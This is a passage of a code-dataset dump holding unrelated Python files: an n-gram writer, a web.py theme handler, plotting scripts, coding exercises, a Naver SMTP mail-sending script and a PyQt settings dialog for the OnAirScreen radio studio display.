main():\n\ttry:\n\t\tf = open(sys.argv[1], \"r\")\n\texcept IndexError:\n\t\tprint(\"File name not specified in command line argument. Correct usage python3 assignment3.py \\n\")\n\t\texit()\n\texcept FileNotFoundError:\n\t\tprint(\"File does not exist. Please enter an existential file name and try again.\\n\")\n\t\texit()\n\ttext = f.read()\n\tinputs = re.split(' ', text)\n\tdata = []\n\tfor i in range(len(inputs)):\n\t\tif not '\\n' in inputs[i]:\n\t\t\tdata.append(inputs[i])\n\t#print(data)\n\tfunigram = open(\"unigram.txt\", \"w\")\n\tfbigram = open(\"bigram.txt\", \"w\")\n\tftrigram = open(\"trigram.txt\", \"w\")\n\tffourgram = open(\"fourgram.txt\", \"w\")\n\tffivegram = open(\"fivegram.txt\", \"w\")\n\tfor i in range(len(data)):\n\t\tfunigram.write(data[i] + \"\\n\")\n\t\t#funigram.write(\"\\n\")\n\tfor i in range(len(data) - 1):\n\t\tfbigram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\n\")\n\tfor i in range(len(data) - 2):\n\t\tftrigram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\t\\t\\t\" + data[i + 2] + \"\\n\")\n\tfor i in range(len(data) - 3):\n\t\tffourgram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\t\\t\\t\" + data[i + 2] + \"\\t\\t\\t\" + data[i + 3] + \"\\n\")\n\tfor i in range(len(data) - 4):\n\t\tffivegram.write(data[i] + \"\\t\\t\\t\" + data[i + 1] + \"\\t\\t\\t\" + data[i + 2] + \"\\t\\t\\t\" + data[i + 3] + \"\\t\\t\\t\" + data[i + 4] + \"\\n\")\n\tffivegram.close()\n\tffourgram.close()\n\tftrigram.close()\n\tfbigram.close()\n\tfunigram.close()\n\tf.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"assignment3/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"267987787","text":"# -*- coding: utf-8 -*-\n\nimport web\n\nimport binascii\nimport time\nimport email\nimport mimetypes\nfrom settings import THEME_TEMPLATE_DIR\n\nfrom theme.models import ThemeFile\n\nfrom google.appengine.api import memcache\n\nclass theme_file(object):\n \"\"\"模板文件处理\"\"\"\n def GET(self, theme, filename):\n mime_type, encoding = mimetypes.guess_type(filename)\n if not mime_type:\n mime_type = 'application/octet-stream'\n \n memcache_key = 'theme:%s:%s' % (theme, filename)\n body = memcache.get(memcache_key)\n \n if not body:\n theme_file_query = ThemeFile.all().filter('theme_name =', theme)\n theme_file_query.filter('filename =', filename)\n theme_file_query.filter('filetype =', 'file')\n f = theme_file_query.get()\n \n if not f:\n raise web.notfound()\n \n body = str(f.filecontent)\n memcache.set(memcache_key, body)\n \n etag = str(binascii.crc32(body))\n self.SetCacheHeader(etag)\n \n match = web.ctx.env.get('HTTP_IF_NONE_MATCH')\n if match and match == etag:\n raise web.notmodified()\n web.header('Content-Type', mime_type)\n return body\n # theme_path = os.path.join(THEME_TEMPLATE_DIR, theme)\n # if os.path.isdir(theme_path):\n # try:\n # filename = os.path.join(theme_path, filename)\n # f = open(filename, 'rb')\n # body = f.read()\n # f.close()\n # etag = str(binascii.crc32(body))\n # self.SetCacheHeader(etag)\n # \n # match = web.ctx.env.get('HTTP_IF_NONE_MATCH')\n # if match and match == etag:\n # raise web.notmodified()\n # except IOError:\n # body = None\n # else:\n # body = None\n \n # if not body:\n # raise web.notfound()\n \n MAX_AGE = 86400\n \n def SetCacheHeader(self, etag=None):\n \"\"\"缓存控制\"\"\"\n web.header('Expires', email.Utils.formatdate(\n time.time() + self.MAX_AGE, usegmt=True))\n web.header('Cache-Control', 'public, max-age=%d' % self.MAX_AGE)\n if etag:\n web.header('ETag', etag)\n","sub_path":"theme/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"16832297","text":"#!/usr/bin/python3\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nf2=open(\"2e_marche.csv\",\"r\")\nfp=open(\"prevision.csv\",\"r\")\nfs=open(\"simple.csv\",\"r\")\nfr=open(\"reserve.csv\",\"r\")\n\ncout_social=[[],[],[],[]]\ncout_social_t=[]\nprix=[[],[],[],[]]\nprix_t=[]\necart_type=[]\necart_type_t=[]\nreserve=[]\nprix_ecart_type=np.array([])\ncout_ecart_type=np.array([])\n\n\n\nfor ligne in fs:\n\tp=np.asfarray(ligne.split(\";\"))\n\tcout_social[0].append(np.sum(p[1:]))\n\tprix[0].append(p[0])\n\nfor ligne in fr:\n\tp=np.asfarray(ligne.split(\";\"))\n\treserve.append(p[0])\n\tcout_social[1].append(np.sum(p[2:]))\n\tprix[1].append(p[1])\n\t\nfor ligne in fp:\n\tp=np.asfarray(ligne.split(\";\"))\n\tcout_social[2].append(np.sum(p[1:]))\n\tprix[2].append(p[0])\n\t\nfor ligne in f2:\n\tp=np.asfarray(ligne.split(\";\"))\n\tecart_type_t.append(p[0])\n\tcout_social_t.append(np.sum(p[2:]))\n\tprix_t.append(p[1])\n\nn_et=0\nwhile ecart_type_t[n_et]==ecart_type_t[0]:\n\tn_et+=1\n\necart_type=ecart_type_t[::n_et]\ncout_social[3] = np.mean(np.split(np.array(cout_social_t),\n\t\t\t\tlen(cout_social_t)/n_et), axis=1)\ncout_ecart_type = np.std(np.split(np.array(cout_social_t),\n\t\t\t\tlen(cout_social_t)/n_et), axis=1)\nprix[3] = np.mean(np.split(np.array(prix_t),\n\t\t\t\tlen(prix_t)/n_et), axis=1)\nprix_ecart_type = np.std(np.split(np.array(prix_t),\n\t\t\t\tlen(prix_t)/n_et), axis=1)\n\nplt.plot(reserve,prix[1],label=\"1er prix avec réserve\")\nplt.plot(reserve,[prix[0][0] for i in range(len(prix[1]))],label=\"1er prix sans réserve\")\nplt.plot(reserve,[prix[2][0] for i in range(len(prix[1]))],label=\"1er prix avec estimation des incertitudes\")\nplt.legend()\nplt.title(\"prix=f(reserve)\")\nplt.figure()\n\nplt.plot(reserve,cout_social[1],label=\"1er coût social avec réserve\")\nplt.plot(reserve,[cout_social[0][0] for i in range(len(cout_social[1]))],label=\"1er coût sans réserve\")\nplt.plot(reserve,[cout_social[2][0] for i in range(len(cout_social[1]))],label=\"1er coût avec estimation des incertitudes\")\nplt.legend()\nplt.title(\"cout social=f(reserve)\")\nplt.figure()\n\nplt.plot(ecart_type,prix[3],label=\"prix moyen\")\nplt.plot(ecart_type,np.array(prix[3])+prix_ecart_type,label=\"prix moyen+écart type prix\")\nplt.plot(ecart_type,np.array(prix[3])-prix_ecart_type,label=\"prix moyen-écart type prix\")\nplt.title(\"prix=f(ecart_type)\")\nplt.legend()\nplt.figure()\n\nplt.plot(ecart_type,cout_social[3],label=\"cout social moyen\")\nplt.plot(ecart_type,np.array(cout_social[3])+cout_ecart_type,label=\"coût moyen+écart type coût\")\nplt.plot(ecart_type,np.array(cout_social[3])-cout_ecart_type,label=\"coût moyen-écart type coût\")\nplt.title(\"cout social=f(ecart_type)\")\nplt.legend()\n#plt.figure()\n\nplt.show()\n\nf2.close()\nfp.close()\nfr.close()\nfs.close()\n","sub_path":"disp_cout.py","file_name":"disp_cout.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"541033769","text":"\"\"\"\r\n\n\nCreate a function which replaces all the x's in the string in the following\nways:\n\nReplace all x's with \"cks\" **UNLESS** :\n\n * The word begins with \"x\", therefore replace it with \"z\".\n * The word is just the letter \"x\", therefore replace it with \"ecks\".\n\n### Examples\n\n x_pronounce(\"Inside the box was a xylophone\") ➞ \"Inside the bocks was a zylophone\"\n \n x_pronounce(\"The x ray is excellent\") ➞ \"The ecks ray is eckscellent\"\n \n x_pronounce(\"OMG x box unboxing video x D\") ➞ \"OMG ecks bocks unbocksing video ecks D\"\n\n### Notes\n\n * All x's are lowercase.\n * I know that not all words with x's follow this rule, but there are too many edge cases to count!\n\n\"\"\"\r\n\ndef x_pronounce(sentence):\n sentence2 = ''\n for i in range(0,len(sentence),1):\n if sentence[i]=='x' and sentence[i-1]==' ' and sentence[i+1]==' ':\n sentence2 += 'ecks'\n elif sentence[i]=='x' and sentence[i-1]==' ':\n sentence2 += 'z'\n elif sentence[i]=='x':\n sentence2 += 'cks'\n else:\n sentence2 += sentence[i]\n return sentence2\n\n","sub_path":"bfz7kTgPujtfcHR9d_2.py","file_name":"bfz7kTgPujtfcHR9d_2.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213938411","text":"'''\n493. Reverse Pairs\nHard\nGiven an array nums, we call (i, j) an important reverse pair if i < j and nums[i] > 2*nums[j].\nYou need to return the number of important reverse pairs in the given array.\nExample1:\nInput: [1,3,2,3,1]\nOutput: 2\nExample2:\nInput: [2,4,3,5,1]\nOutput: 3\n'''\n\nimport collections\n\ndef Combinations_recur(lst,cnt,tmp,fnl_lst):\n\n if len(tmp)==2:\n if ''.join(sorted(tmp)) in fnl_lst.keys():\n fnl_lst[''.join(sorted(tmp))].append(tmp.copy())\n else:\n fnl_lst[''.join(sorted(tmp))]=[]\n fnl_lst[''.join(sorted(tmp))].append(tmp.copy())\n\n\n for i in range(0,len(lst)):\n if cnt[i]==0:\n continue\n tmp.append(str(lst[i]))\n cnt[i]=cnt[i]-1\n Combinations_recur(lst, cnt, tmp, fnl_lst)\n tmp.pop()\n cnt[i]=cnt[i]+1\n\ndef LeetCode493(ary):\n\n dict=collections.Counter(ary)\n lst=[]\n cnt=[]\n for key,val in dict.items():\n lst.append(key)\n cnt.append(val)\n tmp=[]\n fnl_lst={}\n Combinations_recur(lst,cnt,tmp,fnl_lst)\n\n cnt=0\n for key,val in fnl_lst.items():\n sample_ary=ary.copy()\n for tup in val:\n idx_lst=[]\n flg=True\n for l in tup:\n try:\n idx=sample_ary.index(int(l))\n idx_lst.append(idx)\n sample_ary[idx]=-9999\n except:\n flg=False\n if flg==True:\n if sorted(idx_lst)==idx_lst and ary[idx_lst[0]]>2*ary[idx_lst[1]]:\n cnt=cnt+1\n return cnt\n\ndef main():\n\n ary=[1,3,2,3,1]\n print(LeetCode493(ary))\n\n ary = [2,4,3,5,1]\n print(LeetCode493(ary))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/LeetCode493.py","file_name":"LeetCode493.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"210874568","text":"import smtplib\nimport sys\n\nif len(sys.argv != 2):\n print(\"Failed\")\n\nsmtpObj = smtplib.SMTP(\"smtp.naver.com\", 587)\n\nehloResult = smtpObj.ehlo()\nif ehloResult[0] != 250:\n\tprint(\"Failed\")\n\nstarttlsResult = smtpObj.starttls()\nif starttlsResult[0] != 220:\n\tprint(\"Failed\")\n\nloginResult = smtpObj.login(\"oniang@naver.com\", sys.argv[1])\nif loginResult[0] != 235:\n\tprint(\"Failed\")\n\nprint(\"To whom you want to send an email?:\", end=\" \")\nrecipient = input()\n\nprint(\"Subject:\", end=\" \")\nsubject = input()\n\nprint(\"Body:\", end=\" \")\nbody = input()\n\nmsg = \"From: Bonzniak \\nTo: \" + recipient + \"\\nSubject: \" + subject +\"\\n\\n\" + body\nprint(\"\\n<>\\n\" + msg)\n\nsendmailResult = smtpObj.sendmail(\"oniang@naver.com\", recipient, msg)\nif sendmailResult != {}:\n\tprint(\"Sendming the mail failed\")\n\nquitResult = smtpObj.quit()\nif quitResult[0] != 221:\n\tprint(\"Quiting failed\")\n","sub_path":"sh_scrpt/naverMail.py","file_name":"naverMail.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"76126488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#############################################################################\n##\n## OnAirScreen Analog\n## Copyright (C) 2013 Sascha Ludwig\n## All rights reserved.\n##\n## settings_functions.py\n## This file is part of OnAirScreen\n##\n## You may use this file under the terms of the BSD license as follows:\n##\n## \"Redistribution and use in source and binary forms, with or without\n## modification, are permitted provided that the following conditions are\n## met:\n## * Redistributions of source code must retain the above copyright\n## notice, this list of conditions and the following disclaimer.\n## * Redistributions in binary form must reproduce the above copyright\n## notice, this list of conditions and the following disclaimer in\n## the documentation and/or other materials provided with the\n## distribution.\n##\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"\n##\n#############################################################################\n\nfrom PyQt4.QtGui import QApplication, QWidget, QCursor, QPalette, QColorDialog, QColor, QShortcut, QKeySequence, QFileDialog\nfrom PyQt4.QtCore import SIGNAL, QSettings, QCoreApplication, QTimer, QObject, QVariant, pyqtSignal\nfrom PyQt4.QtNetwork import QUdpSocket, QHostAddress, QHostInfo, QNetworkInterface\nfrom settings import Ui_Settings\nfrom collections import defaultdict\nimport json\n\nversionString = \"0.7\"\n\n# class OASSettings for use from OAC\nclass OASSettings():\n def __init__(self):\n self.config = defaultdict(dict)\n self.currentgroup = None\n\n def beginGroup(self, group):\n self.currentgroup = group\n\n def endGroup(self):\n self.currentgroup = None\n\n def setValue(self, name, value):\n if self.currentgroup:\n self.config[self.currentgroup][name] = unicode(value)\n pass\n\n def value(self, name, default=None):\n try:\n return QVariant(self.config[self.currentgroup][name])\n except KeyError:\n return QVariant(default)\n\nclass Settings(QWidget, Ui_Settings):\n sigConfigChanged = pyqtSignal(int, unicode)\n sigExitOAS = pyqtSignal()\n sigRebootHost = pyqtSignal()\n sigShutdownHost = pyqtSignal()\n sigConfigFinished = pyqtSignal()\n sigExitRemoteOAS = pyqtSignal(int)\n sigRebootRemoteHost = pyqtSignal(int)\n sigShutdownRemoteHost = pyqtSignal(int)\n def __init__(self, oacmode=False):\n self.row = -1\n QWidget.__init__(self)\n Ui_Settings.__init__(self)\n self.setupUi(self)\n self._connectSlots()\n self.hide()\n # create settings object for use with OAC\n self.settings = OASSettings()\n self.oacmode = oacmode\n\n # read the config, add missing values, save config and re-read config\n self.restoreSettingsFromConfig()\n self.sigConfigFinished.emit()\n\n # set version string\n self.versionLabel.setText(\"Version %s\" % versionString)\n\n def showsettings(self):\n self.show()\n\n def closeEvent(self, event):\n #emit config finished signal\n self.sigConfigFinished.emit()\n\n def exitOnAirScreen(self):\n if self.oacmode == False:\n #emit app close signal\n self.sigExitOAS.emit()\n else:\n self.sigExitRemoteOAS.emit(self.row)\n\n def rebootHost(self):\n if self.oacmode == False:\n #emit reboot host signal\n self.sigRebootHost.emit()\n else:\n self.sigRebootRemoteHost.emit(self.row)\n\n def shutdownHost(self):\n if self.oacmode == False:\n #emit shutdown host signal\n self.sigShutdownHost.emit()\n else:\n self.sigShutdownRemoteHost.emit(self.row)\n\n def _connectSlots(self):\n self.connect(self.ApplyButton, SIGNAL(\"clicked()\"), self.applySettings )\n self.connect(self.CloseButton, SIGNAL(\"clicked()\"), self.closeSettings )\n self.connect(self.ExitButton, SIGNAL(\"clicked()\"), self.exitOnAirScreen )\n self.connect(self.RebootButton, SIGNAL(\"clicked()\"), self.rebootHost )\n self.connect(self.ShutdownButton, SIGNAL(\"clicked()\"), self.shutdownHost )\n self.connect(self.LEDInactiveBGColor, SIGNAL(\"clicked()\"), self.setLEDInactiveBGColor )\n self.connect(self.LEDInactiveFGColor, SIGNAL(\"clicked()\"), self.setLEDInactiveFGColor )\n self.connect(self.LED1BGColor, SIGNAL(\"clicked()\"), self.setLED1BGColor )\n self.connect(self.LED1FGColor, SIGNAL(\"clicked()\"), self.setLED1FGColor )\n self.connect(self.LED2BGColor, SIGNAL(\"clicked()\"), self.setLED2BGColor )\n self.connect(self.LED2FGColor, SIGNAL(\"clicked()\"), self.setLED2FGColor )\n self.connect(self.LED3BGColor, SIGNAL(\"clicked()\"), self.setLED3BGColor )\n self.connect(self.LED3FGColor, SIGNAL(\"clicked()\"), self.setLED3FGColor )\n self.connect(self.LED4BGColor, SIGNAL(\"clicked()\"), self.setLED4BGColor )\n self.connect(self.LED4FGColor, SIGNAL(\"clicked()\"), self.setLED4FGColor )\n\n self.connect(self.DigitalHourColorButton, SIGNAL(\"clicked()\"), self.setDigitalHourColor )\n self.connect(self.DigitalSecondColorButton, SIGNAL(\"clicked()\"), self.setDigitalSecondColor )\n self.connect(self.DigitalDigitColorButton, SIGNAL(\"clicked()\"), self.setDigitalDigitColor )\n self.connect(self.logoButton, SIGNAL(\"clicked()\"), self.openLogoPathSelector )\n self.connect(self.resetLogoButton, SIGNAL(\"clicked()\"), self.resetLogo )\n\n self.connect(self.StationNameColor, SIGNAL(\"clicked()\"), self.setStationNameColor )\n self.connect(self.SloganColor, SIGNAL(\"clicked()\"), self.setSloganColor )\n\n self.connect(self, SIGNAL(\"triggered()\"), self.closeEvent )\n\n # special OAS Settings from OAC functions\n\n def readConfigFromJson(self, row, config):\n #remember which row we are\n self.row = row\n confdict = json.loads(unicode(config))\n for group, content in confdict.items():\n self.settings.beginGroup(group)\n for key, value in content.items():\n self.settings.setValue(key, value)\n self.settings.endGroup()\n self.restoreSettingsFromConfig()\n\n def readJsonFromConfig(self):\n #return json representation of config\n return json.dumps(self.settings.config)\n\n def restoreSettingsFromConfig(self):\n if self.oacmode == True:\n settings = self.settings\n else:\n settings = QSettings( QSettings.UserScope, \"astrastudio\", \"OnAirScreen\")\n\n settings.beginGroup(\"General\")\n self.StationName.setText(settings.value('stationname', 'Radio Eriwan').toString())\n self.Slogan.setText(settings.value('slogan', 'Your question is our motivation').toString())\n self.setStationNameColor(self.getColorFromName(settings.value('stationcolor', '#FFAA00').toString()))\n self.setSloganColor(self.getColorFromName(settings.value('slogancolor', '#FFAA00').toString()))\n settings.endGroup()\n\n settings.beginGroup(\"NTP\")\n self.checkBox_NTPCheck.setChecked(settings.value('ntpcheck', True).toBool())\n self.NTPCheckServer.setText(settings.value('ntpcheckserver', 'pool.ntp.org').toString())\n settings.endGroup()\n\n settings.beginGroup(\"LEDS\")\n self.setLEDInactiveBGColor(self.getColorFromName(settings.value('inactivebgcolor', '#222222').toString()))\n self.setLEDInactiveFGColor(self.getColorFromName(settings.value('inactivetextcolor', '#555555').toString()))\n settings.endGroup()\n\n settings.beginGroup(\"LED1\")\n self.LED1.setChecked(settings.value('used', True).toBool())\n self.LED1Text.setText(settings.value('text', 'ON AIR').toString())\n self.setLED1BGColor(self.getColorFromName(settings.value('activebgcolor', '#FF0000').toString()))\n self.setLED1FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED1Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED1Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"LED2\")\n self.LED2.setChecked(settings.value('used', True).toBool())\n self.LED2Text.setText(settings.value('text', 'PHONE').toString())\n self.setLED2BGColor(self.getColorFromName(settings.value('activebgcolor', '#DCDC00').toString()))\n self.setLED2FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED2Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED2Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"LED3\")\n self.LED3.setChecked(settings.value('used', True).toBool())\n self.LED3Text.setText(settings.value('text', 'DOORBELL').toString())\n self.setLED3BGColor(self.getColorFromName(settings.value('activebgcolor', '#00C8C8').toString()))\n self.setLED3FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED3Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED3Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"LED4\")\n self.LED4.setChecked(settings.value('used', True).toBool())\n self.LED4Text.setText(settings.value('text', 'ARI').toString())\n self.setLED4BGColor(self.getColorFromName(settings.value('activebgcolor', '#FF00FF').toString()))\n self.setLED4FGColor(self.getColorFromName(settings.value('activetextcolor', '#FFFFFF').toString()))\n self.LED4Autoflash.setChecked(settings.value('autoflash', False).toBool())\n self.LED4Timedflash.setChecked(settings.value('timedflash', False).toBool())\n settings.endGroup()\n\n settings.beginGroup(\"Clock\")\n self.clockDigital.setChecked(settings.value('digital', True).toBool())\n self.clockAnalog.setChecked(not settings.value('digital', True).toBool())\n self.setDigitalHourColor(self.getColorFromName(settings.value('digitalhourcolor', '#3232FF').toString()))\n self.setDigitalSecondColor(self.getColorFromName(settings.value('digitalsecondcolor', '#FF9900').toString()))\n self.setDigitalDigitColor(self.getColorFromName(settings.value('digitaldigitcolor', '#3232FF').toString()))\n self.logoPath.setText(settings.value('logopath', ':/astrastudio_logo/images/astrastudio_transparent.png').toString())\n settings.endGroup()\n\n settings.beginGroup(\"Network\")\n self.udpport.setText(settings.value('udpport', '3310').toString())\n self.tcpport.setText(settings.value('tcpport', '3310').toString())\n settings.endGroup()\n\n def getSettingsFromDialog(self):\n if self.oacmode == True:\n settings = self.settings\n else:\n settings = QSettings( QSettings.UserScope, \"astrastudio\", \"OnAirScreen\")\n\n settings.beginGroup(\"General\")\n settings.setValue('stationname', self.StationName.displayText())\n settings.setValue('slogan', self.Slogan.displayText())\n settings.setValue('stationcolor', self.getStationNameColor().name())\n settings.setValue('slogancolor', self.getSloganColor().name())\n settings.endGroup()\n\n settings.beginGroup(\"NTP\")\n settings.setValue('ntpcheck', self.checkBox_NTPCheck.isChecked())\n settings.setValue('ntpcheckserver', self.NTPCheckServer.displayText())\n settings.endGroup()\n\n settings.beginGroup(\"LEDS\")\n settings.setValue('inactivebgcolor', self.getLEDInactiveBGColor().name())\n settings.setValue('inactivetextcolor', self.getLEDInactiveFGColor().name())\n settings.endGroup()\n\n settings.beginGroup(\"LED1\")\n settings.setValue('used', self.LED1.isChecked())\n settings.setValue('text', self.LED1Text.displayText())\n settings.setValue('activebgcolor', self.getLED1BGColor().name())\n settings.setValue('activetextcolor', self.getLED1FGColor().name())\n settings.setValue('autoflash', self.LED1Autoflash.isChecked())\n settings.setValue('timedflash', self.LED1Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"LED2\")\n settings.setValue('used', self.LED2.isChecked())\n settings.setValue('text', self.LED2Text.displayText())\n settings.setValue('activebgcolor', self.getLED2BGColor().name())\n settings.setValue('activetextcolor', self.getLED2FGColor().name())\n settings.setValue('autoflash', self.LED2Autoflash.isChecked())\n settings.setValue('timedflash', self.LED2Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"LED3\")\n settings.setValue('used', self.LED3.isChecked())\n settings.setValue('text', self.LED3Text.displayText())\n settings.setValue('activebgcolor', self.getLED3BGColor().name())\n settings.setValue('activetextcolor', self.getLED3FGColor().name())\n settings.setValue('autoflash', self.LED3Autoflash.isChecked())\n settings.setValue('timedflash', self.LED3Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"LED4\")\n settings.setValue('used', self.LED4.isChecked())\n settings.setValue('text', self.LED4Text.displayText())\n settings.setValue('activebgcolor', self.getLED4BGColor().name())\n settings.setValue('activetextcolor', self.getLED4FGColor().name())\n settings.setValue('autoflash', self.LED4Autoflash.isChecked())\n settings.setValue('timedflash', self.LED4Timedflash.isChecked())\n settings.endGroup()\n\n settings.beginGroup(\"Clock\")\n settings.setValue('digital', self.clockDigital.isChecked())\n settings.setValue('digitalhourcolor', self.getDigitalHourColor().name())\n settings.setValue('digitalsecondcolor', self.getDigitalSecondColor().name())\n settings.setValue('digitaldigitcolor', self.getDigitalDigitColor().name())\n settings.setValue('logopath', self.logoPath.text())\n settings.endGroup()\n\n settings.beginGroup(\"Network\")\n settings.setValue('udpport', self.udpport.displayText())\n settings.setValue('tcpport', self.tcpport.displayText())\n settings.endGroup()\n\n if self.oacmode == True:\n # send oac a signal the the config has changed\n self.sigConfigChanged.emit(self.row, self.readJsonFromConfig())\n\n\n def applySettings(self):\n #apply settings button pressed\n self.getSettingsFromDialog()\n self.sigConfigFinished.emit()\n\n def closeSettings(self):\n #close settings button pressed\n self.restoreSettingsFromConfig()\n\n def setLED1BGColor(self, newcolor=False):\n palette = self.LED1Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED1Text.setPalette(palette)\n\n def setLEDInactiveBGColor(self, newcolor=False):\n palette = self.LEDInactive.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LEDInactive.setPalette(palette)\n\n def setLEDInactiveFGColor(self, newcolor=False):\n palette = self.LEDInactive.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LEDInactive.setPalette(palette)\n\n def setLED1FGColor(self, newcolor=False):\n palette = self.LED1Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED1Text.setPalette(palette)\n\n def setLED2BGColor(self, newcolor=False):\n palette = self.LED2Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED2Text.setPalette(palette)\n\n def setLED2FGColor(self, newcolor=False):\n palette = self.LED2Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED2Text.setPalette(palette)\n\n def setLED3BGColor(self, newcolor=False):\n palette = self.LED3Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED3Text.setPalette(palette)\n\n def setLED3FGColor(self, newcolor=False):\n palette = self.LED3Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED3Text.setPalette(palette)\n\n def setLED4BGColor(self, newcolor=False):\n palette = self.LED4Text.palette()\n oldcolor = palette.base().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Base, newcolor)\n self.LED4Text.setPalette(palette)\n\n def setLED4FGColor(self, newcolor=False):\n palette = self.LED4Text.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.LED4Text.setPalette(palette)\n\n def setStationNameColor(self, newcolor=False):\n palette = self.StationName.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.StationName.setPalette(palette)\n\n def setSloganColor(self, newcolor=False):\n palette = self.Slogan.palette()\n oldcolor = palette.text().color()\n if not newcolor:\n newcolor = self.openColorDialog( oldcolor )\n palette.setColor(QPalette.Text, newcolor)\n self.Slogan.setPalette(palette)\n\n def getStationNameColor(self):\n palette = self.StationName.palette()\n color = palette.text().color()\n return color\n\n def getSloganColor(self):\n palette = self.Slogan.palette()\n color = palette.text().color()\n return color\n\n def getLEDInactiveBGColor(self):\n palette = self.LEDInactive.palette()\n color = palette.base().color()\n return color\n\n def getLEDInactiveFGColor(self):\n palette = self.LEDInactive.palette()\n color = palette.text().color()\n return color\n\n def getLED1BGColor(self):\n palette = self.LED1Text.palette()\n color = palette.base().color()\n return color\n\n def getLED2BGColor(self):\n palette = self.LED2Text.palette()\n color = palette.base().color()\n return color\n\n def getLED3BGColor(self):\n palette = self.LED3Text.palette()\n color = palette.base().color()\n return color\n\n def getLED4BGColor(self):\n palette = self.LED4Text.palette()\n color = palette.base().color()\n return color\n\n def getLED1FGColor(self):\n palette = self.LED1Text.palette()\n color = palette.text().color()\n return color\n\n def getLED2FGColor(self):\n palette = self.LED2Text.palette()\n color = palette.text().color()\n return color\n\n def getLED3FGColor(self):\n palette = self.LED3Text.palette()\n color = palette.text().color()\n return color\n\n def getLED4FGColor(self):\n palette = self.LED4Text.palette()\n color = palette.text().color()\n return color\n\n def getDigitalHourColor(self):\n palette = self.DigitalHourColor.palette()\n color = palette.window().color()\n return color\n\n def getDigitalSecondColor(self):\n palette = self.DigitalSecondColor.palette()\n color = palette.window().color()\n return color\n\n def getDigitalDigitColor(self):\n palette = self.DigitalDigitColor.palette()\n color = palette.window().color()\n return 